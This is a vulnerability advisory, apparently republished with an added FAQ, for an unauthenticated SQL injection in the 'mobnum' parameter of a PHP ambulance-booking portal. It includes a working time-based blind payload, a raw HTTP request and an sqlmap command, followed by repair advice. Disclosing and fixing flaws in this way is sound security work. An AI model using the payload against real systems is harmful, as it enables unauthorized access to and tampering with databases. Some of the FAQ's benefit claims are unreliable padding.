PHPGurukul Emergency Ambulance Hiring Portal Project V1.0 /admin/contact-us.php SQL Injection

Introduction

In this article, we will discuss a critical SQL injection vulnerability discovered in the PHPGurukul Emergency Ambulance Hiring Portal Project V1.0, specifically in the /admin/contact-us.php file. This vulnerability allows attackers to inject malicious SQL code, gain unauthorized access to the database, and disrupt services.

Affected Product

Emergency Ambulance Hiring Portal

The Emergency Ambulance Hiring Portal is a web-based application developed by PHPGurukul. The portal allows users to book ambulances and provides a platform for emergency services.

Vendor Homepage

The vendor homepage for the Emergency Ambulance Hiring Portal is available at:

https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/

Affected and/or Fixed Versions

Submitter

The submitter of the vulnerability report is xiguala123.

Vulnerable File

The vulnerable file is /admin/contact-us.php.

Version(s)

The affected version is V1.0.

Software Link

The software link for the Emergency Ambulance Hiring Portal is available at:

https://phpgurukul.com/?sdm_process_download=1&download_id=18972

Problem Type

Vulnerability Type

The vulnerability type is SQL injection.

Root Cause

The root cause of the vulnerability lies in the fact that attackers can inject malicious code via the parameter "mobnum". This input is then directly utilized in SQL queries without undergoing proper sanitization or validation processes.

Impact

Exploiting this SQL injection vulnerability allows attackers to gain unauthorized access to the database, cause sensitive data leakage, tamper with data, gain complete control over the system, and even disrupt services. This poses a severe threat to both the security of the system and the continuity of business operations.

Description

During the security assessment of the Emergency Ambulance Hiring Portal, I detected a critical SQL injection vulnerability in the /admin/contact-us.php file. This vulnerability is attributed to the insufficient validation of user input for the "mobnum" parameter. This inadequacy enables attackers to inject malicious SQL queries. Consequently, attackers can access the database without proper authorization, modify or delete data, and obtain sensitive information. Immediate corrective actions are essential to safeguard system security and uphold data integrity.

No Login or Authorization Required

No login or authorization is required to exploit this vulnerability.

Vulnerability Details and POC

Vulnerability Location

The vulnerability location is the "mobnum" parameter.

Payload

The payload for the vulnerability is:

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: pagetitle=Contact Us&email=test@gmail.com&mobnum=7894561236' AND (SELECT 8941 FROM (SELECT(SLEEP(5)))Zcyv) AND 'flty'='flty&pagedes=#890 KFG Apartment, Gauri Kunj, Delhi-India.&submit=

Vability Request Packet

The vulnerability request packet is:

POST /eahp/admin/contact-us.php HTTP/1.1
Host: 10.20.235.36
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Origin: http://10.20.235.36
Connection: keep-alive
Referer: http://10.20.235.36/eahp/admin/contact-us.php
Cookie: PHPSESSID=sjf02k96fmtdjl9pgf1ce0n7fu
Upgrade-Insecure-Requests: 1
Priority: u=0, i

pagetitle=Contact+Us&email=test%40gmail.com&mobnum=1&pagedes=%23890+KFG+Apartment%2C+Gauri+Kunj%2C+Delhi-India.&submit=

Screenshots of Specific Information Obtained from Testing and Running with the sqlmap Tool

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

sqlmap -r vuln.txt --dbs

Suggested Repair

Employ Prepared Statements and Parameter Binding

Employ prepared statements and parameter binding to safeguard against SQL injection. Prepared statements serve as an effective safeguard against SQL injection as they segregate SQL code from user input data. When using prepared statements, user-entered values are treated as mere data and will not be misconstrued as SQL code.

Conduct Input Validation and Filtering

Conduct input validation and filtering to guarantee that user input data conforms to the expected format. This helps in blocking malicious input.

Minimize Database User Permissions

Q: What is the PHPGurukul Emergency Ambulance Hiring Portal Project V1.0 /admin/contact-us.php SQL injection vulnerability?

A: The PHPGurukul Emergency Ambulance Hiring Portal Project V1.0 /admin/contact-us.php SQL injection vulnerability is a critical security flaw that allows attackers to inject malicious SQL code, gain unauthorized access to the database, and disrupt services.

Q: What is the root cause of the vulnerability?

A: The root cause of the vulnerability lies in the fact that attackers can inject malicious code via the parameter "mobnum". This input is then directly utilized in SQL queries without undergoing proper sanitization or validation processes.

Q: What are the potential impacts of exploiting this vulnerability?

A: Exploiting this SQL injection vulnerability allows attackers to gain unauthorized access to the database, cause sensitive data leakage, tamper with data, gain complete control over the system, and even disrupt services. This poses a severe threat to both the security of the system and the continuity of business operations.

Q: Is login or authorization required to exploit this vulnerability?

A: No login or authorization is required to exploit this vulnerability.

Q: What is the suggested repair for this vulnerability?

A: The suggested repair for this vulnerability includes:

1. Employing prepared statements and parameter binding: Employ prepared statements and parameter binding to safeguard against SQL injection. Prepared statements serve as an effective safeguard against SQL injection as they segregate SQL code from user input data. When using prepared statements, user-entered values are treated as mere data and will not be misconstrued as SQL code.
2. Conducting input validation and filtering: Conduct input validation and filtering to guarantee that user input data conforms to the expected format. This helps in blocking malicious input.
3. Minimizing database user permissions: Minimize database user permissions to ensure that the account used to connect to the database has only the minimum required permissions. Avoid using accounts with elevated privileges (such as 'root' or 'admin') for day-to-day operations.

Q: What are the benefits of employing prepared statements and parameter binding?

A: Employing prepared statements and parameter binding provides several benefits, including:

• Improved security: Prepared statements and parameter binding help to prevent SQL injection attacks by segregating SQL code from user input data.
• Improved performance: Prepared statements and parameter binding can improve performance by reducing the number of database queries and improving query optimization.
• Improved maintainability: Prepared statements and parameter binding can improve maintainability by making it easier to modify and update database queries.

Q: What are the benefits of conducting input validation and filtering?

A: Conducting input validation and filtering provides several benefits, including:

• Improved security: Input validation and filtering help to prevent malicious input from entering the system, reducing the risk of SQL injection attacks.
• Improved data quality: Input validation and filtering help to ensure that user input data conforms to the expected format, improving data quality and reducing errors.
• Improved maintainability: Input validation and filtering can improve maintainability by making it easier to modify and update database queries.

Q: What are the benefits of minimizing database user permissions?

A: Minimizing database user permissions provides several benefits, including:

• Improved security: Minimizing database user permissions helps to reduce the risk of unauthorized access to the database and sensitive data.
• Improved data integrity: Minimizing database user permissions helps to ensure that only authorized users have access to sensitive data, improving data integrity.
• Improved maintainability: Minimizing database user permissions can improve maintainability by making it easier to modify and update database queries.